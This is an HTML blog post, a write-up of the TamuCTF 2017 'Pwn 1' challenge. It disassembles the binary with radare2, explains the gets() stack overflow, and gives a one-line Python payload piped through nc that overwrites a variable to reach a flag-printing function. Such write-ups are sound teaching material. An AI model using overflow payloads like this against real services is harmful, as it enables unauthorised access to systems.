<!DOCTYPE html>
<html>
<head>
    <meta name="generator" content="Hugo 0.32-DEV" />

    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="description" content="My thoughts and rambles">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    
    <link rel="icon" type="image/png" href="/images/favicon.ico">

    
    <meta name="mobile-web-app-capable" content="yes">
    <link rel="icon" sizes="192x192" href="/images/touch/chrome-touch-icon-192x192.png">

    
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    <meta name="apple-mobile-web-app-title" content="Material Design Lite">
    <link rel="apple-touch-icon-precomposed" href="apple-touch-icon-precomposed.png">

    
    <meta name="msapplication-TileImage" content="images/touch/ms-touch-icon-144x144-precomposed.png">
    <meta name="msapplication-TileColor" content="#3372DF">

    <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:regular,bold,italic,thin,light,bolditalic,black,medium&amp;lang=en"/>
    <link rel="stylesheet" href="/css/ionicons.min.css"/>
    <link rel="stylesheet" href="https://storage.googleapis.com/code.getmdl.io/1.1.3/material.grey-orange.min.css"/>
    <link rel="stylesheet" href="https://fonts.googleapis.com/icon?family=Material+Icons">
    <link rel="stylesheet" href="/css/hmdl-style.css"/>
	<link rel="stylesheet" href="/css/pygment.css">


<script>
window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date;
ga('create', 'UA-103806632-1', 'auto');
ga('send', 'pageview');
</script>
<script async src='//www.google-analytics.com/analytics.js'></script>


    <title>TamuCTF 2017 - Pwn 1</title>
</head>

<body style="background-image: url('/images/background.jpg');">
    <div id="MainCnt" class="hmdl-body mdl-layout mdl-js-layout has-drawer is-upgraded">        
        <header class="mdl-layout__header mdl-layout__header--transparent mdl-layout__header--scroll">
            <div class="mdl-layout__header-row">
                <div class="mdl-layout-spacer"></div>
                <nav class="mdl-navigation">
                <a class="mdl-navigation__link" href="/">Home</a>
                <a class="mdl-navigation__link" href="/post/">Articles</a>
                <a class="mdl-navigation__link" href="/project/">Projects</a>
                <a class="mdl-navigation__link" href="/about/">About</a>
                </nav>
            </div>
        </header>
        <div class="mdl-layout__drawer">
            <nav class="mdl-navigation">
            <a class="mdl-navigation__link" href="/">Home</a>
            <a class="mdl-navigation__link" href="/post/">Articles</a>
            <a class="mdl-navigation__link" href="/project/">Projects</a>
            <a class="mdl-navigation__link" href="/about/">About</a>
            </nav>
        </div>

        <main class="mdl-layout__content">

		

            <div class="hmdl-page mdl-grid">
                <div class="mdl-card mdl-shadow--4dp mdl-cell mdl-cell--12-col">
                    <div class="mdl-card__media mdl-color-text--grey-50" style=" background-color:white;">
                        <h3 style="color:orange;">TamuCTF 2017 - Pwn 1</h3>
                    </div>
                    <div class="hmdl-page-meta mdl-color-text--grey-700 mdl-card__supporting-text">
                        <div class="minilogo" style="background-image: url('/images/avatar-64x64.png');"></div>

                        <div>
							<strong>
                            		<strong>Tzaoh</strong>
							</strong>
                            <span>Aug 8, 2017</span>
                        </div>
                        <div class="section-spacer"></div>
                    </div>
                    <div class="hmdl-page-content mdl-color-text--grey-700 mdl-card__supporting-text">
                        

<p><img src="/assets/TamuCTF2017/pwn1/1-pwn1_description.png" alt="Pwn1 Challenge Description" /></p>

<p>We are told that there is a binary running remotely and its code is available to download. Lets download and open it with r2.</p>
<div class="highlight"><pre><code class="language-bash" data-lang="bash"><span></span>$ wget https://ctf.tamu.edu/files/7e968d03d9caa11a2f4f2909bd3cabc9/pwn1
$ r2 -A pwn1  
</code></pre></div>

<blockquote>
<p>At some point the link will be broken, if so you can use the <a href="https://github.com/BlackHoods/BlackHoods.github.io/raw/master/assets/TamuCTF2017/pwn1/pwn1">one</a> from the repository.</p>
</blockquote>

<p>Now that the binary is opened, lets see some stuff inside it.</p>

<div class="highlight"><pre><code class="language-r2" data-lang="r2"><span></span>[<span class="mh">0x08048450</span>]<span class="o">&gt;</span> <span class="nf">afl</span>
<span class="s">0x08048390</span><span class="mh">    3 35           </span>sym._init
<span class="s">0x080483d0</span><span class="mh">    1 6            </span>sym.imp.gets
<span class="s">0x080483e0</span><span class="mh">    1 6            </span>sym.imp._IO_getc
<span class="s">0x080483f0</span><span class="mh">    1 6            </span>sym.imp.puts
<span class="s">0x08048400</span><span class="mh">    1 6            </span>sym.imp.__libc_start_main
<span class="s">0x08048410</span><span class="mh">    1 6            </span>sym.imp.setvbuf
<span class="s">0x08048420</span><span class="mh">    1 6            </span>sym.imp.fopen
<span class="s">0x08048430</span><span class="mh">    1 6            </span>sym.imp.putchar
<span class="s">0x08048440</span><span class="mh">    1 6            </span>sub.__gmon_start___252_440
<span class="s">0x08048450</span><span class="mh">    1 33           </span>entry0
<span class="s">0x08048480</span><span class="mh">    1 4            </span>sym.__x86.get_pc_thunk.bx
<span class="s">0x08048490</span><span class="mh">    4 43           </span>sym.deregister_tm_clones
<span class="s">0x080484c0</span><span class="mh">    4 53           </span>sym.register_tm_clones
<span class="s">0x08048500</span><span class="mh">    3 30           </span>sym.__do_global_dtors_aux
<span class="s">0x08048520</span><span class="mh">    4 43</span><span class="o">   -&gt;</span><span class="mh"> 40</span>   sym.frame_dummy
<span class="hll"><span class="s">0x0804854b</span><span class="mh">    4 103          </span>sym.print_flag
</span><span class="hll"><span class="s">0x080485b2</span><span class="mh">    4 120          </span>main
</span><span class="s">0x08048630</span><span class="mh">    4 93           </span>sym.__libc_csu_init
<span class="s">0x08048690</span><span class="mh">    1 2            </span>sym.__libc_csu_fini
<span class="s">0x08048694</span><span class="mh">    1 20           </span>sym._fini
</code></pre></div>


<p>Interesting, there is <code>print_flag</code> function at <code>0x0804854b</code>. Lets see what&rsquo;s inside of it.</p>

<div class="highlight"><pre><code class="language-r2" data-lang="r2"><span></span>[<span class="mh">0x08048450</span>]<span class="o">&gt;</span> <span class="nf">s</span> sym.print_flag 
[<span class="mh">0x0804854b</span>]<span class="o">&gt;</span> <span class="nf">pdf</span> 
<span class="k">┌</span> (<span class="o">fcn</span>) <span class="k">sym</span><span class="o">.</span>print_flag <span class="m">103</span> 
<span class="k">│</span>   <span class="k">sym</span><span class="o">.</span>print_flag ();
<span class="k">│</span>           <span class="c">; var int local_dh @ ebp-0xd</span>
<span class="k">│</span>           <span class="c">; var int local_ch @ ebp-0xc</span>
<span class="k">│</span>              <span class="c">; CALL XREF from 0x08048606 (main)</span>
<span class="k">│</span>           <span class="s">0x0804854b</span>      55             <span class="k">push</span> <span class="k">ebp</span>
<span class="k">│</span>           <span class="s">0x0804854c</span>      89e5           <span class="k">ebp</span> <span class="o">=</span> <span class="k">esp</span>
<span class="k">│</span>           <span class="s">0x0804854e</span>      83ec18         <span class="k">esp</span> <span class="o">-=</span> <span class="mh">0x18</span>
<span class="k">│</span>           <span class="s">0x08048551</span>      83ec0c         <span class="k">esp</span> <span class="o">-=</span> <span class="mh">0xc</span>
<span class="k">│</span>           <span class="s">0x08048554</span>      68b0860408     <span class="k">push</span> <span class="k">str</span><span class="o">.</span>How_did_you_figure_out_my_secret__
<span class="k">│</span>           <span class="s">0x08048559</span>      e892feffff     <span class="k">sym</span><span class="o">.</span><span class="k">imp</span><span class="o">.</span>puts ()
<span class="k">│</span>           <span class="s">0x0804855e</span>      83c410         <span class="k">esp</span> <span class="o">+=</span> <span class="mh">0x10</span>
<span class="k">│</span>           <span class="s">0x08048561</span>      83ec08         <span class="k">esp</span> <span class="o">-=</span> <span class="m">8</span>
<span class="k">│</span>           <span class="s">0x08048564</span>      68d3860408     <span class="k">push</span> <span class="mh">0x80486d3</span>
<span class="hll"><span class="k">│</span>           <span class="s">0x08048569</span>      68d5860408     <span class="k">push</span> <span class="k">str</span><span class="o">.</span>flag.txt
</span><span class="hll"><span class="k">│</span>           <span class="s">0x0804856e</span>      e8adfeffff     <span class="k">sym</span><span class="o">.</span><span class="k">imp</span><span class="o">.</span>fopen ()
</span><span class="k">│</span>           <span class="s">0x08048573</span>      83c410         <span class="k">esp</span> <span class="o">+=</span> <span class="mh">0x10</span>
<span class="k">│</span>           <span class="s">0x08048576</span>      8945f4         dword [<span class="k">local_ch</span>] <span class="o">=</span> <span class="k">eax</span>
<span class="k">│</span>       <span class="k">┌─&lt;</span> <span class="s">0x08048579</span>      eb10           <span class="mh">goto</span> <span class="mh">0x804858b</span>
<span class="k">│</span>       <span class="k">│</span>      <span class="c">; JMP XREF from 0x080485a0 (sym.print_flag)</span>
<span class="k">│</span>      <span class="k">┌──&gt;</span> <span class="s">0x0804857b</span>      0fbe45f3       <span class="k">eax</span> <span class="o">=</span> byte [<span class="k">local_dh</span>]
<span class="k">│</span>      <span class="k">|│</span>   <span class="s">0x0804857f</span>      83ec0c         <span class="k">esp</span> <span class="o">-=</span> <span class="mh">0xc</span>
<span class="k">│</span>      <span class="k">|│</span>   <span class="s">0x08048582</span>      50             <span class="k">push</span> <span class="k">eax</span>
<span class="k">│</span>      <span class="k">|│</span>   <span class="s">0x08048583</span>      e8a8feffff     <span class="k">sym</span><span class="o">.</span><span class="k">imp</span><span class="o">.</span>putchar ()
<span class="k">│</span>      <span class="k">|│</span>   <span class="s">0x08048588</span>      83c410         <span class="k">esp</span> <span class="o">+=</span> <span class="mh">0x10</span>
<span class="k">│</span>      <span class="k">↑│</span>      <span class="c">; JMP XREF from 0x08048579 (sym.print_flag)</span>
<span class="k">│</span>      <span class="k">|└─&gt;</span> <span class="s">0x0804858b</span>      83ec0c         <span class="k">esp</span> <span class="o">-=</span> <span class="mh">0xc</span>
<span class="k">│</span>      <span class="k">|</span>    <span class="s">0x0804858e</span>      ff75f4         <span class="k">push</span> dword [<span class="k">local_ch</span>]
<span class="k">│</span>      <span class="k">|</span>    <span class="s">0x08048591</span>      e84afeffff     <span class="k">sym</span><span class="o">.</span><span class="k">imp</span><span class="o">.</span>_IO_getc ()
<span class="k">│</span>      <span class="k">|</span>    <span class="s">0x08048596</span>      83c410         <span class="k">esp</span> <span class="o">+=</span> <span class="mh">0x10</span>
<span class="k">│</span>      <span class="k">|</span>    <span class="s">0x08048599</span>      8845f3         byte [<span class="k">local_dh</span>] <span class="o">=</span> <span class="k">al</span>
<span class="k">│</span>      <span class="k">|</span>    <span class="s">0x0804859c</span>      807df3ff       <span class="mh">var</span> <span class="o">=</span> byte [<span class="k">local_dh</span>] <span class="o">-</span> <span class="mh">0xff</span>
<span class="k">│</span>      <span class="k">└──&lt;</span> <span class="s">0x080485a0</span>      75d9           <span class="mh">if</span> (<span class="mh">var</span>) <span class="mh">goto</span> <span class="mh">0x804857b</span>
<span class="k">│</span>           <span class="s">0x080485a2</span>      83ec0c         <span class="k">esp</span> <span class="o">-=</span> <span class="mh">0xc</span>
<span class="k">│</span>           <span class="s">0x080485a5</span>      6a0a           <span class="k">push</span> <span class="mh">0xa</span>
<span class="k">│</span>           <span class="s">0x080485a7</span>      e884feffff     <span class="k">sym</span><span class="o">.</span><span class="k">imp</span><span class="o">.</span>putchar ()
<span class="k">│</span>           <span class="s">0x080485ac</span>      83c410         <span class="k">esp</span> <span class="o">+=</span> <span class="mh">0x10</span>
<span class="k">│</span>           <span class="s">0x080485af</span>      90             
<span class="k">└</span>           <span class="s">0x080485b0</span>      c9             
</code></pre></div>


<p>Because of the offsets <code>0x08048569</code> and <code>0x0804856e</code>, we can deduce that the function opens a file called <code>flag.txt</code> and prints its content. Fantastic ✌️ , so we just need to know who will call <code>print_flag</code>. This can be figured out through the <code>axt</code> command of r2 which stands for &ldquo;cross reference to&rdquo; the current function.</p>
<div class="highlight"><pre><code class="language-r2" data-lang="r2"><span></span>[<span class="mh">0x0804854b</span>]<span class="o">&gt;</span> <span class="nf">axt</span>
call <span class="mh">0x8048606</span> call sym<span class="o">.</span>print_flag in main
</code></pre></div>

<p>Cool, so this function will be called from offset <code>0x8048606</code> which belongs to <code>main</code> function. Lets see whats inside it.</p>

<p><div class="highlight"><pre><code class="language-r2" data-lang="r2"><span></span>[<span class="mh">0x0804854b</span>]<span class="o">&gt;</span> <span class="nf">pdf</span> @ main   
<span class="k"> </span>           <span class="c">;-- main:</span>
<span class="k">┌</span> (<span class="o">fcn</span>) main <span class="m">120</span>
<span class="k">│</span>   main ();
<span class="k">│</span>           <span class="c">; var int local_27h @ ebp-0x27</span>
<span class="k">│</span>           <span class="c">; var int local_ch @ ebp-0xc</span>
<span class="k">│</span>           <span class="c">; var int local_4h_2 @ ebp-0x4</span>
<span class="k">│</span>           <span class="c">; var int local_4h @ esp+0x4</span>
<span class="k">│</span>              <span class="c">; DATA XREF from 0x08048467 (entry0)</span>
<span class="k">│</span>           <span class="s">0x080485b2</span>      8d4c2404       <span class="k">ecx</span> <span class="o">=</span> [<span class="k">local_4h</span>]
<span class="k">│</span>           <span class="s">0x080485b6</span>      83e4f0         <span class="k">esp</span> <span class="o">&amp;=</span> <span class="mh">0xfffffff0</span>
<span class="k">│</span>           <span class="s">0x080485b9</span>      ff71fc         <span class="k">push</span> dword [<span class="k">ecx</span> <span class="o">-</span> <span class="m">4</span>]
<span class="k">│</span>           <span class="s">0x080485bc</span>      55             <span class="k">push</span> <span class="k">ebp</span>
<span class="k">│</span>           <span class="s">0x080485bd</span>      89e5           <span class="k">ebp</span> <span class="o">=</span> <span class="k">esp</span>
<span class="k">│</span>           <span class="s">0x080485bf</span>      51             <span class="k">push</span> <span class="k">ecx</span>
<span class="k">│</span>           <span class="s">0x080485c0</span>      83ec24         <span class="k">esp</span> <span class="o">-=</span> <span class="mh">0x24</span>
<span class="k">│</span>           <span class="s">0x080485c3</span>      a130a00408     <span class="k">eax</span> <span class="o">=</span> dword <span class="k">obj</span><span class="o">.</span>stdout
<span class="k">│</span>           <span class="s">0x080485c8</span>      6a00           <span class="k">push</span> <span class="m">0</span>
<span class="k">│</span>           <span class="s">0x080485ca</span>      6a00           <span class="k">push</span> <span class="m">0</span>
<span class="k">│</span>           <span class="s">0x080485cc</span>      6a02           <span class="k">push</span> <span class="m">2</span>
<span class="k">│</span>           <span class="s">0x080485ce</span>      50             <span class="k">push</span> <span class="k">eax</span>
<span class="k">│</span>           <span class="s">0x080485cf</span>      e83cfeffff     <span class="k">sym</span><span class="o">.</span><span class="k">imp</span><span class="o">.</span>setvbuf ()
<span class="k">│</span>           <span class="s">0x080485d4</span>      83c410         <span class="k">esp</span> <span class="o">+=</span> <span class="mh">0x10</span>
<span class="k">│</span>           <span class="s">0x080485d7</span>      83ec0c         <span class="k">esp</span> <span class="o">-=</span> <span class="mh">0xc</span>
<span class="k">│</span>           <span class="s">0x080485da</span>      68de860408     <span class="k">push</span> <span class="k">str</span><span class="o">.</span>Enter_the_secret_word:
<span class="k">│</span>           <span class="s">0x080485df</span>      e80cfeffff     <span class="k">sym</span><span class="o">.</span><span class="k">imp</span><span class="o">.</span>puts ()
<span class="k">│</span>           <span class="s">0x080485e4</span>      83c410         <span class="k">esp</span> <span class="o">+=</span> <span class="mh">0x10</span>
<span class="k">│</span>           <span class="s">0x080485e7</span>      c745f4000000.  dword [<span class="k">local_ch</span>] <span class="o">=</span> <span class="m">0</span>
<span class="k">│</span>           <span class="s">0x080485ee</span>      83ec0c         <span class="k">esp</span> <span class="o">-=</span> <span class="mh">0xc</span>
<span class="hll"><span class="k">│</span>           <span class="s">0x080485f1</span>      8d45d9         <span class="k">eax</span> <span class="o">=</span> [<span class="k">local_27h</span>]
</span><span class="hll"><span class="k">│</span>           <span class="s">0x080485f4</span>      50             <span class="k">push</span> <span class="k">eax</span>
</span><span class="hll"><span class="k">│</span>           <span class="s">0x080485f5</span>      e8d6fdffff     <span class="k">sym</span><span class="o">.</span><span class="k">imp</span><span class="o">.</span>gets ()
</span><span class="k">│</span>           <span class="s">0x080485fa</span>      83c410         <span class="k">esp</span> <span class="o">+=</span> <span class="mh">0x10</span>
<span class="hll"><span class="k">│</span>           <span class="s">0x080485fd</span>      817df41eab11.  <span class="mh">var</span> <span class="o">=</span> dword [<span class="k">local_ch</span>] <span class="o">-</span> <span class="mh">0xca11ab1e</span>
</span><span class="hll"><span class="k">│</span>       <span class="k">┌─&lt;</span> <span class="s">0x08048604</span>      7507           <span class="mh">if</span> (<span class="mh">var</span>) <span class="mh">goto</span> <span class="mh">0x804860d</span>
</span><span class="hll"><span class="k">│</span>       <span class="k">│</span>   <span class="s">0x08048606</span>      e840ffffff     <span class="k">sym</span><span class="o">.</span>print_flag ()
</span><span class="k">│</span>      <span class="k">┌──&lt;</span> <span class="s">0x0804860b</span>      eb10           <span class="mh">goto</span> <span class="mh">0x804861d</span>
<span class="k">│</span>      <span class="k">││</span>      <span class="c">; JMP XREF from 0x08048604 (main)</span>
<span class="k">│</span>      <span class="k">│└─&gt;</span> <span class="s">0x0804860d</span>      83ec0c         <span class="k">esp</span> <span class="o">-=</span> <span class="mh">0xc</span>
<span class="k">│</span>      <span class="k">│</span>    <span class="s">0x08048610</span>      68f5860408     <span class="k">push</span> <span class="k">str</span><span class="o">.</span>That_is_not_the_secret_word_
<span class="k">│</span>      <span class="k">│</span>    <span class="s">0x08048615</span>      e8d6fdffff     <span class="k">sym</span><span class="o">.</span><span class="k">imp</span><span class="o">.</span>puts ()             <span class="c">; int puts(const char *s)</span>
<span class="k">│</span>      <span class="k">│</span>    <span class="s">0x0804861a</span>      83c410         <span class="k">esp</span> <span class="o">+=</span> <span class="mh">0x10</span>
<span class="k">│</span>      <span class="k">│</span>       <span class="c">; JMP XREF from 0x0804860b (main)</span>
<span class="k">│</span>      <span class="k">└──&gt;</span> <span class="s">0x0804861d</span>      b800000000     <span class="k">eax</span> <span class="o">=</span> <span class="m">0</span>
<span class="k">│</span>           <span class="s">0x08048622</span>      8b4dfc         <span class="k">ecx</span> <span class="o">=</span> dword [<span class="k">local_4h_2</span>]
<span class="k">│</span>           <span class="s">0x08048625</span>      c9             
<span class="k">│</span>           <span class="s">0x08048626</span>      8d61fc         <span class="k">esp</span> <span class="o">=</span> [<span class="k">ecx</span> <span class="o">-</span> <span class="m">4</span>]
<span class="k">└</span>           <span class="s">0x08048629</span>      c3             
</code></pre></div>
</p>

<p>We see that <code>print_flag</code> will be called if the condition <code>local_ch == 0xca11ab1e</code> is satisfied. But wait a moment, if we give a closer look to the assembly instrucctions we realized that the only variable we are supposed to edit is <code>local_27h</code> through the <code>gets</code> function.</p>

<blockquote>
<p>So what we need to do?</p>
</blockquote>

<p>As maybe you know, <code>gets</code> is an unsecure function, because it does not check how many characters it must copy in memory when you introduce them. Then, if we input more characters than it is supposed to store, we will be able to overwrite neighbor local variables!</p>

<p>How can we know the length of the string we must provide? By knowing where the variables are stored onto the stack</p>

<p><img src="/assets/TamuCTF2017/pwn1/5-pwn1_stack_view.png" alt="Pwn1 Stack diagram" /></p>

<p>So finally, how many bytes do we need to start writting <code>local_ch</code>?
Easy!</p>

<p><code>($ebp - 0xC) - ($ebp - 0x27)  = 0x27 - 0xC = 0x1B = 27d</code> 27 Characters.</p>
<div class="highlight"><pre><code class="language-bash" data-lang="bash"><span></span>$ python -c <span class="s1">&#39;print(&quot;A&quot;*27 + &quot;\x1E\xAB\x11\xCA&quot;)&#39;</span> <span class="p">|</span> nc pwn.ctf.tamu.edu <span class="m">4322</span>
Enter the secret word:
How did you figure out my secret?!
gigem<span class="o">{</span>T00_435Y<span class="o">}</span>
</code></pre></div>

<p>Answer: gigem{T00_435Y}</p>

<h3 id="complete-video">Complete video</h3>

<p><a href="https://asciinema.org/a/2juhmtxkdf7qrnzbury7rzzjc?autoplay=1"><img src="https://asciinema.org/a/2juhmtxkdf7qrnzbury7rzzjc.png" width="400"/></a></p>

<h3 id="tools-used">Tools used:</h3>

<ul>
<li><a href="https://github.com/radare/radare2">radare2</a> - To analyze the binary.</li>
<li><a href="https://www.draw.io/">draw.io</a> - To draw some graphics.</li>
<li><a href="https://asciinema.org">asciinema</a> - To record the session.</li>
</ul>

                    </div>
                    <div class="hmdl-page-comments mdl-color-text--primary-contrast mdl-card__supporting-text comments"> 
                        <strong>
                            	<strong>Tzaoh</strong>
						</strong>
                        <p></p>
                    </div>  
                </div>                
                <nav class="mdl-color-text--grey-50 mdl-cell mdl-cell--12-col">
                    <div class="section-spacer"></div>
                    <a href="/post/tamuctf2017/pwn2/">
                        Newer
                        <button class="mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon mdl-color--white mdl-color-text--grey-900" role="presentation">
                            <i class="icon ion-android-arrow-forward"></i>
                        </button>
                    </a>
                </nav>
 
            </div>        
        </main>
        <footer class="mdl-mini-footer">
            <div class="mdl-mini-footer--left-section">                
                <a class="mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon mdl-mini-footer--social-btn social-btn" href="mailto:pwn4tion@gmail.com?subject=Hi">
                    <i class="material-icons_lg icon ion-email"></i>
                    <span class="visuallyhidden">Email</span>
                </a>
                <a class="mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon mdl-mini-footer--social-btn social-btn" href="https://github.com/Pwnation">
                    <i class="material-icons_lg icon ion-social-github"></i>
                    <span class="visuallyhidden">Github</span>
                </a>
                <a class="mdl-button mdl-js-button mdl-js-ripple-effect mdl-button--icon mdl-mini-footer--social-btn social-btn" href="https://twitter.com/PwnationBlog">
                    <i class="material-icons_lg icon ion-social-twitter "></i>
                    <span class="visuallyhidden">Twitter</span>
                </a>


            </div>
            <div class="mdl-mini-footer--right-section">
                <span>© 2017 </span>
            </div>
        </footer>
        <div class="mdl-layout__obfuscator"></div>
    </div>
    <script src="https://code.getmdl.io/1.1.3/material.min.js"></script>


</body>
</html>

